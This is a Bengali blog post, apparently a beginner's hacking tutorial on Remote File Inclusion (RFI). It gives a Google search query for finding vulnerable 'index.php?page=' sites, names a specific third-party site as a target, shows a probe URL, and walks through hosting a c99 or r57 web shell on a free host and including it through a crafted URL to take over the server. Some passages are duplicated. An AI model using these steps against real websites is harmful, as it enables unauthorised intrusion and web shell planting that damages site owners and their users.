আসসালামু আলাইকুম! সবাই কেমন আছেন? আশা করি ভাল আছেন।
এটা আমার প্রথম টিউন গ্রীন ওয়েব ডট কম বিডিতে। আশা করি ভুল হলে ক্ষমা করবেন। আর সেই সাথে ধন্যবাদ জোবায়ের ভাইকে আমকে এই টপ সাইটে লিখার সুযোগ করে দেওয়ার জন্য।
আজকে আমি আপনাদের দেখাব হ্যাকিং এর অন্যতম এক ম্যাথড RFI বা (Remote file inclusion) এর কাজ।
- Remote file inclusion
বিদ্রঃ- লিখাটা শুদু মাত্র নতুনদের জন্য তাই আমি শুরু থেকে লিখব মানে, একধম প্রথম থেকে!
প্রথম RFI বা Remote file inclusion কী?
- আর এফ আই
Remote file inclusion এর সংক্ষিপ্ত রুপ হল RFI । এটি অন্যান্য হ্যাকিং ম্যাথডের মধ্যে অন্যতম হ্যাকিং ম্যাথড। সকল হ্যাকিং পদ্ধতির মতো এই পদ্ধতিতেও আপনাকে ওয়েবসাইটের vulnerability বের করতে হবে। এই vulnerability এর মাধ্যমে আপনি একটি ওয়েব সার্ভারে Remote file inclusionযুক্ত করতে পারবেন।
এখন সাইট vulnerable কিনা তা বুজবেন কিভাবে?
এখন সাইট vulnerable কিনা তা বুজবেন কিভাবে?
http://www.yourtargetsite.com/index.php?page=Anything (এইটা দেখেন)
এখন গুগল ডক দরকার তাই না?
গুগল ডক
“inurl:index.php?page=”
এখন এই গুগল ডক গুগলে লিখে সার্চ দেন! তাহলে গুগল আপনাকে index.php?page= এই সম্পর্কের যত সাইট আছে তা রেজাল্টে দেখাবে :D
এখন গুগল ডক দরকার তাই না?
গুগল ডক
“inurl:index.php?page=”
এখন এই গুগল ডক গুগলে লিখে সার্চ দেন! তাহলে গুগল আপনাকে index.php?page= এই সম্পর্কের যত সাইট আছে তা রেজাল্টে দেখাবে :D
এখন সার্চ রিজাল্ট থেকে যে কোন একটা সাইটে প্রবেশ করুন। যেমন আমি পেয়েছি এই সাইট
http://www.tolvan.com/
এখন এই সাইটে ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে কি না? তা কিভাবে চেক করবেন?
যে ভাবে চেক করবেনঃ- http://www.tolvan.com/v2/index.php?page=http://www.greenweb.com.bd
http://www.tolvan.com/
এখন এই সাইটে ওয়েব সাইটে RFI ইঞ্জেকশান দেয়া যাবে কি না? তা কিভাবে চেক করবেন?
যে ভাবে চেক করবেনঃ- http://www.tolvan.com/v2/index.php?page=http://www.greenweb.com.bd
মানে কি বুঝতে পেরেছেন? মানে আপনার সার্চ করা যে কোন সাইট এর শেষে যে কোন একটা সাইট লিংক দেন। যদি উক্ত ওয়েবসাইটটির পেজে অন্য ওয়েবসাইটকে দেখা যায় তাহলে বুঝবেন যে ঐ ওয়েব সাইটে RFI ইঞ্জেকশান দেওয়া যাবে।
এখন শেল আপলোড করার পালাঃ-
শেল আপলোড করে করবেন, কারন আপুনি যে সাইট হ্যাক করেছেন তার প্রমান দিবেন।
সাধারণত বেশিভাগ হ্যাকার c99 shel তে শেল আপলোড করে। আপুনি ও আপলোড করতে পারেন। আমি দেখাব কিভাবে c99 shel শেল আপলোড করবেন। আবার কোন কোন হ্যাকার r57 shell আপলোড করে। যার যেখানে ইচ্ছা।
সেল আপলোড করতে হলে যে কোন একটা হোস্টিং সাইটে সেল আপলোড করতে হবে যেমন, 110mb.com সহ আর অনেক সাইট।
এখন মনে করেন আমি 110mb.com সাইটে সেল আপলোড করলাম। তাইলে লিংক এই রকম হবে
http://110mb.com/tjusthack/c784shell.php?
এখন একটা কমান্ড দিব
http://www.tolvan.com/v2/index.php??pagehttp:// 110mb.com /tjusthack/c784shell.php? নোটঃ লিংকের শেষে “ ? ” এটা দিতে হবে! নাইলে আপনার লিংক কাজ করবে না! আশা করি বুজতে পেরেছেন? আমার একটা সমস্যা আমি বুজিয়ে লিখতে পারি না। কিন্তু যত দূর সম্ভব তত দূর চেষ্টা করেছে বুজানোর। বাকিটা আপানদের উপর। কোন সমস্যা হলে আমায় পাবেন ফেসবুকে আর হ্যা অবশ্যাই নতুন কিছু পেতে গ্রীন ওয়েব এর সাথে থাকুন ।
